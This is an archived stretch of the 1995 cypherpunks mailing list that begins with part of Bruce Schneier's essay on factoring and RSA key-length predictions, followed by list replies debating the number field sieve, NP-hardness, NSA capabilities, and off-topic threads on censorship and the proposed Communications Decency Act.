It is not unreasonable to assume that the general number field
sieve can be optimized to run this fast; it is possible that the
NSA already knows how to do this.  Table 3 gives the number of
mips-years required for the special number field sieve to factor
numbers of different lengths.

         Table 3: Factoring Using the Special Number Field Sieve

         # of bits         mips-years required to factor

         512               < 200
         768               100,000
         1024              3*10^7
         1280              3*10^9
         1536              2*10^11
         2048              4*10^14

At a European Institute for System Security workshop in 1992, the
participants agreed that a 1024-bit modulus should be sufficient
for long-term secrets through 2002.  However, they warned: 
"Although the participants of this workshop feel best qualified
in their respective areas, this statement [with respect to
lasting security] should be taken with caution."  This is good
advice.

The wise cryptographer is ultra-conservative when choosing
public-key key lengths.  To determine how long a key you need
requires you to look at both the intended security and lifetime
of the key, and the current state-of-the-art of factoring.  Today
you need a 1024-bit number to get the level of security you got
from a 512-bit number in the early 1980s.  If you want your keys
to remain secure for 20 years, 1024 bits is likely too short.

Even if your particular secrets aren't worth the effort required
to factor your modulus, you may be at risk.  Imagine an automatic
banking system that uses RSA for security.  Mallory can stand up
in court and say: "Did you read in the newspaper in 1994 that
RSA-129 was broken, and that 512-bit numbers can be factored by
any organization willing to spend a few million dollars and wait
a few months?  My bank uses 512-bit numbers for security, and by
the way I didn't make these seven withdrawals."  Even if Mallory
is lying, the judge will probably put the onus on the bank to
prove it.

Earlier I called making predictions foolish.  Now I am about to
make some.  Table 4 gives my recommendations for public-key
lengths, depending on how long you require the key to be secure. 
There are three key lengths for each year, one secure against an
individual, one secure against a major corporation, and the third
secure against a major government.

Here are some assumptions from the mathematicians who factored
RSA-129:

         We believe that we could acquire 100 thousand machines
         without superhuman or unethical efforts.  That is, we would
         not set free an Internet worm or virus to find resources for
         us.  Many organizations have several thousand machines each
         on the net.  Making use of their facilities would require
         skillful diplomacy, but should not be impossible.  Assuming
         the 5 mips average power, and one year elapsed time, it is
         not too unreasonable to embark on a project which would
         require half a million mips years.

The project to factor the 129-digit number harnesses an estimated
0.03% of the total computing power of the Internet, and they
didn't even try very hard.  It isn't unreasonable to assume that
a well-publicized project can harness 0.1% of the world's
computing power for a year.

Assume a dedicated cryptanalyst can get his hands on 10,000 mips-
years, a large corporation can get 10^7 mips-years, and that a
large government can get 10^9 mips-years.  Also assume that
computing power will increase by a factor of ten every five
years.  And finally, assume that advances in factoring
mathematics allows us to factor general numbers at the speeds of
the special number field sieve.  Table 4 recommends different key
lengths for security during different years.

         Table 4: Recommended public-key key lengths (in bits)

         Year     vs. I             vs. C             vs. G
         1995      768              1280              1536
         2000     1024              1280              1536
         2005     1280              1536              2048
         2010     1280              1536              2048
         2015     1536              2048              2048

Remember to take the value of the key into account.  Public keys
are often used to secure things of great value for a long time:
the bank's master key for a digital cash system, the key the
government uses to certify its passports, a notary public's
digital signature key.  It probably isn't worth the effort to
spend months of computing time to break an individual's private
key, but if you can print your own money with a broken key the
idea becomes more attractive.  A 1024-bit key is long enough to
sign something that will be verified within the week, or month,
or even a few years.  But you don't want to stand up in court
twenty years from now with a digitally signed document, and have
the opposition demonstrate how to forge documents with the same
signature.

Making predictions beyond the near future is even more foolish. 
Who knows what kind of advances in computing, networking, and
mathematics are going to happen by 2020?  However, if you look at
the broad picture, in every decade we can factor numbers twice as
long as in the previous decade.  This leads to Table 5.

         Table 5:  Long-range factoring predictions 

         Year     Key length (in bits)
         1995     1024
         2005     2048
         2015     4096
         2025     8192
         2035     16,384
         2045     32,768

Not everyone will agree with my recommendations.  The NSA has
mandated 512-bit to 1024-bit keys for their Digital Signature
Standard--far less than I recommend for long-term security.  PGP
has a maximum RSA key length of 1280 bits.  Lenstra, the world's
most successful factorer, refuses to make predictions past ten
years.  And Table 6 gives Ron Rivest's key-length
recommendations, originally made in 1990, which I consider much
too optimistic.  While his analysis looks fine on paper, recent
history illustrates that surprises regularly happen.  It makes
sense to choose your keys to be resilient against future
surprises.

         Table 6: Rivest's Optimistic Key-Length Recommendations (In
         Bits)

         Year     Low      Avg      High
         1990     398      515      1289
         1995     405      542      1399
         2000     422      572      1512
         2005     439      602      1628
         2010     455      631      1754
         2015     472      661      1884
         2020     489      677      2017

         Low estimates assume a budget of $25,000, the quadratic
         sieve algorithm, and a technology advance of 20% per year. 
         Average estimates assume a budget of $25 million, the
         general number field sieve algorithm, and a technology
         advance of 33% per year.  High estimates assume a budget of
         $25 billion, a general quadratic sieve algorithm running at
         the speed of the special number field sieve, and a
         technology advance of 45% per year.

There is always the possibility that an advance in factoring will
surprise me as well, but I think that unlikely.  But why trust
me?  I just proved my own foolishness by making predictions.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doug@OpenMind.com (Doug Cutrell)
Date: Sun, 12 Feb 95 17:33:06 PST
To: cypherpunks@toad.com
Subject: Re: Factoring - State of the Art and Predictions
Message-ID: <ab6456634e021003a86a@[198.232.141.2]>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Schneier gives us:

>         Table 4: Recommended public-key key lengths (in bits)
>
>         Year     vs. I             vs. C             vs. G
>         1995      768              1280              1536
>         2000     1024              1280              1536
>         2005     1280              1536              2048
>         2010     1280              1536              2048
>         2015     1536              2048              2048


I applaud Bruce for making this unpopular presentation of the somber facts.
If these figures are taken seriously, the conclusion is that 1024 bit keys
are not even good TODAY if one is concerned about the C or G level attack.
In fact, not even the 1280 bit key is good for G level attack today.

Pay attention, people.  Factoring is still a good cryptographic approach,
but the key lengths have to keep growing larger.  Factoring may be NP-hard
in the key length, but the rate of growth of our ability to factor is
actually going up exponentially as well.  The speed of encryption and
decryption for 2048 bit keys on my Pentium is quite reasonable today... and
my confidence in the long-term security of my encrypted files has increased
considerably with the advent of PGP 2.6.2, for just that reason.

Doug Cutrell

_____________________________________________________________
Doug Cutrell                    General Partner
doug@OpenMind.com               Open Mind, Santa Cruz
=============================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sun, 12 Feb 95 23:24:08 PST
To: lmccarth@ducie.cs.umass.edu (L. McCarthy)
Subject: Re: UMich student arrested for rape story
In-Reply-To: <199502122347.SAA15127@ducie.cs.umass.edu>
Message-ID: <950212.175322.2U7.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, L. Futplex McCarthy writes:

> It appears to me that people on the left are choosing (wrongly, IMHO) to 
> interpret a work of fiction as a threat, and proceed from there. I imagine
> that people on the right don't see the work of fiction as a threat to her, 
> but simply want to ban fictional works they dislike anyway.

Given the current "regulate the Internet" frenzy we're seeing almost
everywhere, couldn't this be an example of grabbing a scapegoat?  I see
this whole deal as opportunistic, especially since the alleged victim of
the "threat" appeared unaware that the "threat" had even been made.
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org
  perl -e '$x = 1/20; print "Just my \$$x! (adjusted for inflation)\n"'
        "What do you mean, you've never been to Alpha Centauri?"
                                               -- Prostetnic Vogon Jeltz

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLz6g2hvikii9febJAQEi7AP+IuDcbHY/PjI7HC3j29jtHFiMbFIS5fdG
2c08NQgnjiA8ul3fsJUUcmQ/sdr0WxZrR0qIRTwzBoX1baVDr0POARn4DY/5TrbH
Qmav0KW/kJQEqaX2uvu2MvdF5NFWiYlXB06ZysOhgHuj7wcAsCGyTwTpA5hpKmFj
3ZAP0vHuLaM=
=iXE+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 12 Feb 95 15:07:04 PST
To: cypherpunks@toad.com
Subject: Clinton's No Warrant decree, and insulting dogs
Message-ID: <199502122306.SAA27050@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by rishab@dxm.ernet.in () on Mon, 13 Feb  
1:26 AM


>Why is Clinton kowtowing to the Notional Security 
>Agency and the Federal  Bureau of Instigation all of a 
>sudden? Is this a 'law-and-order' shift to  the right 
>of a New New Democrat?



The NY Times report today on the near miss of "terrorist 
mastermind" Yousef in Manila after a kitchen blaze of 
cooking-up explosives, says that he was seen walking rapidly 
away talking on a cellular phone.


Allegedly left behind on a laptop was a disk "filled with 
details of his plots to kill Pope John Paul II, and to blow up 
American jets flying in the Far East."


Twenty (20) FBI agents were sent to pick him up in Islamabad, 
Pakistan for safe home in the New York.


A concerned citizen may ask:


What was picked up from the phone, or will be affidavited to 
have been picked up.


What was on the disk, or will be solemnly sworn to have been 
found on the disk.


And, finally, what armament and intergalatic technology 
accompanied the SWAT team -- over and back, to provide full 
cloak and security on land, sea and air?  And, with that show 
as spoof, how was he really imported?  How many other fake 
transports were set in motion?


When will we learn more of the lurid Clancy-juicy details of 
this black-op budget-busting crowd-pleaser?


Is this a laptop dog and pony?  No offense to Fifi and Holy 
Bull and Apple.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zachary  <zachary@pentagon.io.com>
Date: Sun, 12 Feb 95 16:12:48 PST
To: schneier@chinet.chinet.com
Subject: Re: Factoring - State of the Art and Predictions
In-Reply-To: <m0rdnqt-000k5xC@mailbox.mcs.com>
Message-ID: <199502130012.SAA17341@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain



This touches on something I was thinking the other day:  Most
cryptosystems that we seem to use are based on the assumption that
factoring large numbers is a Hard Problem.  Isn't this putting all our
eggs in one basket?  Are there other Hard Problems crypto systems can be
based on?  In the ludicrous case, suppose Eve is visited by aliens and
given a black box that would instantly factor a number irrelevant of its
size... how much of current cryptography would this device invalidate? 
I'm no crypto-expert, so I don't know... but surely there are other hard
problems in the universe that we can base crypto on...

 --Zachary






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 12 Feb 95 18:19:13 PST
To: cypherpunks@toad.com
Subject: Re: Factoring - State of the Art and Predictions
In-Reply-To: <m0rdnqt-000k5xC@mailbox.mcs.com>
Message-ID: <199502130218.SAA00223@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


schneier@chinet.chinet.com writes:

 > ((Comments are appreciated.  -Bruce))

Ok.

[Nice historical presentation of factoring snipped]

 > A new factoring algorithm has taken over from the quadratic
 > sieve: the general number field sieve. In 1989
 > mathematicians would have told you that the general number
 > field sieve would never be practical.

 > In 1992 they would have told you that it was practical, but
 > only faster than the quadratic sieve for numbers greater
 > than 130-150 digits or so. Today it is known to be faster
 > than the quadratic sieve for numbers well below 116 digits.

 > The general number field sieve can factor a 512-bit number
 > over 10 times faster than the quadratic sieve.

The GNFS situation is a little bit more complicated than that.
Today's factoring algorithms work by finding distinct square
roots of the same quadratic residue modulo the number to be
factored.  Each such discovery yields an approximately 50% chance
of factoring the number using Euclid's GCD algorithm.

Since searching directly for a congruence of squares would be
grossly inefficient, one sieves for relations involving arbitrary
powers of numbers from a set called the "factor base", and after
collecting an overdetermined number of such relations, finds
their null space modulo two in huge matrix operation.  This
yields a relation whose powers are all even, from which a
congruence of squares may be constructed in an obvious manner.

Most popular factoring methods including NFS, GNFS, and numerous
flavors of QS utilize this general scheme, and differ only in the
numbers to which they are applicable and in the methods that they
use to fish for relations in more densely populated mathematical
waters.

GNFS uses a particularly cute trick, which is to express the
number being factored as a polynomial with small coefficients,
evaluated at a small argument.  On can then construct a
homomorphism from a ring of algebraic integers into Z/nZ. This
permits sieving to be conducted in a particularly efficient
fashion.

Finding such a polynomial, unfortunately, is a far from
straightforward task.  Current state of the art is to start with
a guess, and flog it to death on a workstation for several days,
attempting some sort of stepwise refinement.  Although the
problem is mathematically rich, no systematic method currently
exists to pick the "best" polynomial, and the problem of doing so
may be of a difficulty comparable to factoring.

The speed with which GNFS runs and the degree to which it
outperforms QS is extremely sensitive to the polynomial chosen,
so the blanket statement that GNFS outperforms QS by a factor of
10 on 512 bit numbers is in my opinion, a bit of an
oversimplification.

GNFS is one of the most complicated computer algorithms to be
constructed, sieving and factoring simultaneously in both a ring
of algebraic integers and in Z/nZ. The algorithm has been known
to experience "cycle explosions" in which unexpectly large
amounts of raw data are produced from relatively small numbers.
It is certainly not something that can be regularly run in
"production mode" and it requires a skilled operator (currently
its creator) to help it coast smoothly through its various
stages.

I don't think GNFS is going to be available in shrink-wrapped
form for quite some time. :)

 > A related algorithm, the special number field sieve, can
 > already factor numbers of a certain specialized
 > form--numbers not generally used for cryptography--must
 > faster than the general number field sieve can factor
 > general numbers of the same size.

NFS and GNFS are essentially the same algorithm.  NFS is simply a
special case where a particularly simple polynomial is known,
Z[a] is a unique factorization domain, and some other nice
algebraic properties are present.  In the case of a general
integer, and a more complex polynomial, some things get messier.

 > It is not unreasonable to assume that the general number
 > field sieve can be optimized to run this fast; it is
 > possible that the NSA already knows how to do this.

I think this is unlikely.  The difference in speed is due to the
fact that NFS only factors specially chosen simple numbers, and
GNFS factors anything.  That is not something that is likely to
be optimized away.

Also, I think we make far to much of the magical ability of the
NSA to do things.  At the present point in time, most of the
cryptomathematical expertise in the world is external to the NSA.
The NSA didn't invent GNFS, or for that matter, public key
cryptography.

 > Making predictions beyond the near future is even more
 > foolish. Who knows what kind of advances in computing,
 > networking, and mathematics are going to happen by 2020?
 > However, if you look at the broad picture, in every decade
 > we can factor numbers twice as long as in the previous
 > decade.

GNFS probably represents the final step in the evolution of the
"combination of congruences" factoring methods.  Further
refinements would probably be such complicated algorithms as to
be inpractical to program.

Additional improvements in our ability to break RSA will probably
come via some new factoring scheme that we are presently unaware
of, or via a method of computing the inverse of the encryption
permutation used by RSA which does not require explicit formation
of the factors of the modulus.

 >          Table 5:  Long-range factoring predictions

 >          Year     Key length (in bits)
 >          1995     1024
 >          2005     2048
 >          2015     4096
 >          2025     8192
 >          2035     16,384
 >          2045     32,768

I think factoring technology may reach its "Omega Point" long
before 2045.  Twenty years from now, we might be able to factor
anything.  I think predictions past ten years are pure
speculation.

 > There is always the possibility that an advance in
 > factoring will surprise me as well, but I think that
 > unlikely.

I expect to be surprised by an advance in factoring momentarily.
You are far too pessimistic. :)

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Sun, 12 Feb 95 15:45:24 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: UMich student arrested for rape story
In-Reply-To: <199502121026.CAA19268@igc3.igc.apc.org>
Message-ID: <199502122347.SAA15127@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rich Dutcher writes:
> However, given the information available to date, I see no reason to 
> believe that he's been busted for writing "erotic fiction"  rather than 
> threatening a woman.  

The July `94 issue of Harper's described the case of a Menlo Park city 
employee who claimed in 1993 to be harassed by some paintings of female nudes
hanging in a hallway. The city removed the paintings the following day. It
used to be that when the majority of people in some state/county/town 
disapproved of some instance of expression, they could suppress it. This was
bad. Nowadays, it takes just one zealot to suppress it. This is much worse.
As far as I can see, anyone can claim to be harassed/threatened/offended by
just about anything, and get away with it.  Just the other day, I heard that
in Vermont (or was it New Hampshire ?), they're still talking seriously about
an amendment to the state constitution against burning the U.S. flag. Between
the censors on the left and the censors on the right, there's precious little
room remaining for those of us in the middle who believe in tolerating
divergent views.

It appears to me that people on the left are choosing (wrongly, IMHO) to 
interpret a work of fiction as a threat, and proceed from there. I imagine
that people on the right don't see the work of fiction as a threat to her, but 
simply want to ban fictional works they dislike anyway.

> Violence against women is too real, 

Strongly agreed, but a newsgroup article is not an act of violence.

> and in other contexts courts have held to a standard of what a "reasonable 
> woman" might fear.

Well, we'll have to see how it goes. It's tough for me to see why a 
"reasonable woman" would fear an article of which she was totally unaware.

I get the impression that neither did he imply a threat, nor did she infer a
threat. 

> BTW, does alt.sex.stories presume fiction, or is it pretend truth 
> like the readers' sex stories in Penthouse?

I don't know for sure, though I expect alt.sex.wizards would be more likely
to fall in the latter category :] .

-L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sun, 12 Feb 95 16:53:30 PST
To: Zachary  <zachary@pentagon.io.com>
Subject: Re: Factoring - State of the Art and Predictions
Message-ID: <ab645cdf0102100421a7@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:12 PM 02/12/95, Zachary wrote:
>This touches on something I was thinking the other day:  Most
>cryptosystems that we seem to use are based on the assumption that
>factoring large numbers is a Hard Problem.  Isn't this putting all our
>eggs in one basket?  Are there other Hard Problems crypto systems can be

Keep in mind that it's been mathematically proven that factoring is
NP-complete.  That is, it's in the set of problems including such things as
discrete logs and the travelling salesman problem, such that if a
polynomial time solution is found to _any_ of these problems, one can be
found for all of them.  Of course it hasn't been proven that none of the
problems in NP can be solved in polynomial time, so it hasn't been proven
that these are "hard problems".  But I suspect that most problems suspected
to be Hard Problems that one could base a crypto system off of, are also
NP-complete, so it wouldn't be any better to use them then to use
factoring.   Logarithms, for instance, are used in some crypto systems, and
are another suspected Hard Problem, but are also NP complete.  So if
factoring is solved,  discrete logarithms will be solved too.

At least that's how I understand it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 12 Feb 95 17:17:01 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: Factoring - State of the Art and Predictions
In-Reply-To: <ab645cdf0102100421a7@[132.162.201.201]>
Message-ID: <199502130119.UAA03807@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



Johnathan Rochkind writes:
>
>Keep in mind that it's been mathematically proven that factoring is
>NP-complete.
...

No it hasn't.  Factoring is believed to be hard, but no one has ever
shown it to be NP-hard (let alone NP complete).

...
>factoring.   Logarithms, for instance, are used in some crypto systems, and
>are another suspected Hard Problem, but are also NP complete.  So if
>factoring is solved,  discrete logarithms will be solved too.

Ditto for discrete log.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 12 Feb 95 17:21:31 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Factoring - State of the Art and Predictions
In-Reply-To: <Pine.3.89.9502121608.A20084-0100000@netcom10>
Message-ID: <9502130121.AA19540@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" says:
> So far no one has found a way of applying NP problems to
> Crypto.

Further than that, it has been shown that a large class of ways to
apply NP complete problems to crypto are insecure -- this being
generalizations of the break of the knapsack problem based
cryptosystems...

> Of course you can do discrete log on weird fields -- there
> is a lot of research in that which I do not understand at all.

Most of the eliptic curve stuff maps pretty straightforwardly into
the "normal" case and vice versa.

.pmm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sun, 12 Feb 95 17:26:36 PST
To: Matt Blaze <cypherpunks@toad.com
Subject: Re: Factoring - State of the Art and Predictions
Message-ID: <ab64660a03021004491e@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:19 PM 02/12/95, Matt Blaze wrote:
>No it hasn't.  Factoring is believed to be hard, but no one has ever
>shown it to be NP-hard (let alone NP complete).

Woops.  Thanks for the correction, and thanks to everyone else who managed
to correct me within only minutes after I made the mistake.  :)  You can
all stop sending me mail now.

[Moral of the story: don't make a math error on the cypherpunks list.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 12 Feb 95 17:45:56 PST
To: schneier@chinet.chinet.com
Subject: Re: Factoring - State of the Art and Predictions
In-Reply-To: <m0rdnqt-000k5xC@mailbox.mcs.com>
Message-ID: <9502130145.AA19584@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



schneier@chinet.chinet.com says:
> Making predictions beyond the near future is even more foolish. 
> Who knows what kind of advances in computing, networking, and
> mathematics are going to happen by 2020?  However, if you look at
> the broad picture, in every decade we can factor numbers twice as
> long as in the previous decade.  This leads to Table 5.

I'm not sure I agree with this assumption. From current knowledge, it
seems that factoring is still exponential -- we've just progressed on
the algorithms a bit. That can't continue forever, though. Assuming
algorithms remain stable on your most optimistic estimate (which would
require some advances even so), we would assume that factoring would
remain exponential, and that adding a constant number of bits to a
number would add a constant factor to the increase in
complexity. Since computing speeds are also rising exponentially, but
not superexponentially, we would assume that the number of bits we
could factor would grow linearly with time -- that is, each decade
would see numbers about another 60-80 digits long factored. This would
mean that every doubling in key length would give us more than just a
constant increase in the safety factor.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Sun, 12 Feb 95 21:22:34 PST
To: cypherpunks@toad.com
Subject: bill alert...
Message-ID: <199502130515.VAA14482@art.net>
MIME-Version: 1.0
Content-Type: text/plain


Do you think this will force folks into using encryption?
If I was a sysop, I sure would have all my users using
encryption... :)

-lile



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Lile Elam	    |  "a brush in hand, a wisp of wind, she sighs 
lile@art.net        |   knowing that this will be the great one..."	
http://www.art.net  |						    -lile
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




                       -> EMA ALERT <-
            News For and About the Members of the
               ELECTRONIC MESSAGING ASSOCIATION
============================================================
                February 3, 1995 -- Number 18
<---------------------------------------------------------->
                  ***** SPECIAL ALERT *****
 - Congress to consider making all system operators liable
   for messaging content.  Bill would force employers to
   monitor message content.              ACTION NEEDED NOW!
<---------------------------------------------------------->

UNREASONABLE NETWORK POLICING PROPOSED
   Yesterday, Senator Jim Exon (D-NE) introduced S.314, the
Communications Decency Act of 1995, in the United States
Senate.  In an effort to stamp out digital pornography, it
makes all telecommunications providers doing business in the
United States (from the telephone companies all the way down
to offices that use LANs) liable for the content of anything
sent over their networks.  To avoid the possibility of tens
of thousands of dollars in fines and up to two years in
jail, business owners would be forced to police their
networks and monitor in advance all messages sent over them.

WITHOUT ACTION - COULD BE LAW IN MONTHS
   This bill is substantially the same as the one he put
forward last year.  He will offer it as an amendment to the
pending telecommunications deregulation legislation in the
U.S. Senate, which is expected to be enacted by July.  Last
year, his amendment was adopted even though many thought it
hastily drafted and poorly thought out.  Fortunately, the
telecommunications deregulation legislation died.  This
year, a more conservative U.S. Congress may be even more
reluctant to challenge a "morality" amendment; and its
legislative vehicle, the telecommunications deregulation
legislation, stands a much better chance of passage this
year.

ACTION NEEDED NOW
   Action by the business community is needed now.  Please
notify your corporate government affairs office and/or your
legal counsel.  This measure could be adopted as an
amendment to the telecommunications bill IN A MATTER OF
WEEKS (or potentially added to any legislation pending on
the U.S. Senate floor), if business does not mobilize
against it.  S.314 will not stop digital pornography, but it
could devastate the messaging business.  If you are
interested in further information or are able to participate
in lobbying efforts over the next few weeks, contact Sarah
Reardon at EMA (see below).

------------------------------------------------------------
EMA ALERT is published and copyrighted (1995) by the
Electronic Messaging Association.  Permission to reproduce
and/or redistribute with attribution is hereby given to all
EMA members.  For more information about anything in EMA
ALERT, contact EMA via e-mail - use either X.400 (S=info;
O=ema; A=mci; C=us) or Internet (info@ema.org) address,
facsimile (1-703-524-5558), or telephone (1-703-524-5550).
Any EMA staff member can be addressed directly via e-mail by
using, for X.400, G=<firstname>; S=<lastname>; O=ema; A=mci;
C=us, and, for Internet, <firstinitial><lastname>@ema.org.
EMA's postal address is 1655 N. Fort Myer Dr. #850,
Arlington, VA 22209 USA.


------ End of Forwarded Message







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 12 Feb 95 18:31:17 PST
To: mpd@netcom.com (Mike Duvos)
Subject: The NSA (Was Re: Factoring - State of the Art and Predictions )
In-Reply-To: <199502130218.SAA00223@netcom3.netcom.com>
Message-ID: <9502130231.AA19651@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos says:
> Also, I think we make far to much of the magical ability of the
> NSA to do things.  At the present point in time, most of the
> cryptomathematical expertise in the world is external to the NSA.
> The NSA didn't invent GNFS, or for that matter, public key
> cryptography.

I'm on both sides of this issue. On the one hand, the people in the
open crypto community are now, or soon will, substantially exceed in
number the people in the black community, and the people in the open
community have certain advantages in the way that they do their
work. On the other hand, the people in the black community have the
advantage that they can read anything that the open community produces
but not vice versa, and they have at least a 15 year edge in knowledge
about the design of conventional systems, and who knows (we certainly
have no idea) how much of an edge in the modern cryptographic
arena. We don't know for sure if the NSA knew about Public Key before
the open community did. Certainly they knew of differential
cryptanalysis and similar techniques, and they must know quite a lot
that we don't.

The black community also has lots of day-to-day experience that we
don't have, and they understand both the threat model and the
practical side of things a lot better than we do.

Overall, I'd say that in the long run the open community is going to
catch up regardless of what the NSA likes. That does not mean,
however, that this is going to happen particularly soon, or that they
don't still know decades more than we do.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Sun, 12 Feb 95 23:20:24 PST
To: cypherpunks@toad.com
Subject: Re: UMich student arrested for rape story
Message-ID: <199502130721.XAA24596@igc3.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> The July `94 issue of Harper's described the case of a Menlo Park city 
> employee who claimed in 1993 to be harassed by some paintings of female nudes
> hanging in a hallway. The city removed the paintings the following day. It
> used to be that when the majority of people in some state/county/town 
> disapproved of some instance of expression, they could suppress it. This was
> bad. Nowadays, it takes just one zealot to suppress it. This is much worse.
> As far as I can see, anyone can claim to be harassed/threatened/offended by
> just about anything, and get away with it.  Just the other day, I heard that
> in Vermont (or was it New Hampshire ?), they're still talking seriously about
> an amendment to the state constitution against burning the U.S. flag. Between
> the censors on the left and the censors on the right, there's precious little
> room remaining for those of us in the middle who believe in tolerating
> divergent views.
> 
Toleration of divergent views is not one of those issues that breaks 
out well along left-right polarities.  E.g., Andrea Dworkin's closest 
aliies on porn are on the xtian right, not among her fellow radical 
feminists [contrary to the image promoted in some mass media].  
Threats to Catcher in the Rye in libraries are far more common than 
incidents like the one in Menlo Park.

> > Violence against women is too real, 
> 
> Strongly agreed, but a newsgroup article is not an act of violence.
> 
Legally, that's a question yet to be resolved.

In any case, this is hardly cyrpto-related.  I would far rather lurk 
as the mathematicians discuss factoring.  I learn more [even if I 
only get one word in three :-]


===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 12 Feb 95 23:32:57 PST
To: cypherpunks@toad.com
Subject: The NSA (Was Re: Factoring - State of the Art and Predictions )
Message-ID: <199502130732.XAA28958@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@imsi.com> writes:

 > On the other hand, the people in the black community have
 > the advantage that they can read anything that the open
 > community produces but not vice versa, and they have at
 > least a 15 year edge in knowledge about the design of
 > conventional systems, and who knows (we certainly have no
 > idea) how much of an edge in the modern cryptographic arena.

Such a situation does not apply solely to the NSA.  There are,
for instance, secret lodges of French mystics who devote
themselves to higher mathematics, absorb everything the open
community produces, and rarely publish anything or draw attention
to themselves.  They solve problems, write secret manuscripts,
put them on shelves, and have been doing this for centuries.
Perhaps the ultimate factoring algorithm already exists within
their walls.  We would never know if it did, unless they chose to
tell us.

The NSA is very good at solving problems that require "acres of
Crays".  They are crack numerical analysts and algorithm
designers. They also make nice block ciphers.  I do not think,
however, that they have deeply profound insights into the
complexity of computation that exceed those of the University
community, and certainly not by 15 years.

 > We don't know for sure if the NSA knew about Public Key
 > before the open community did. Certainly they knew of
 > differential cryptanalysis and similar techniques, and they
 > must know quite a lot that we don't.

Rumour has it that the NSA nearly had a collective epileptic fit
when they realized the implications of Public Key Cryptography.
Yes, they did invent differential cryptanalysis and some other
techniques before outsiders thought of them, but I'm unsure this
implies some great cabal of hidden knowlege on their part.  It is
more likely a case of throwing research dollars at a problem
which had not yet captured the interest of researchers outside
the intelligence community.

 > Overall, I'd say that in the long run the open community is
 > going to catch up regardless of what the NSA likes. That
 > does not mean, however, that this is going to happen
 > particularly soon, or that they don't still know decades
 > more than we do.

I think the NSA has lost its edge completely in the last decade,
as cryptographic research in the open community has taken off. It
is much the same sort of situation experienced by IBM, when they
were slow to catch on to the paradigm shift created by
distributed computing and workstations, and companies like Sun
rose from nowhere to become major players.

If the NSA were a corporation, they would be apologizing to their
shareholders, restructuring, and trying to identify a market
niche they could continue to be a player in.  Since they are
funded by government, we don't see them doing this, but it is
absurd to suggest that they are still decades ahead of the rest
of the world in basic research and technology.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aegis@netcom.com (Dale Harrison)
Date: Mon, 13 Feb 95 00:31:05 PST
To: cypherpunks@toad.com
Subject: Re: The NSA (Was Re: Factoring - State of the Art and Predictions )
Message-ID: <199502130830.AAA02302@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>I think the NSA has lost its edge completely in the last decade,
>as cryptographic research in the open community has taken off. It
>is much the same sort of situation experienced by IBM, when they
>were slow to catch on to the paradigm shift created by
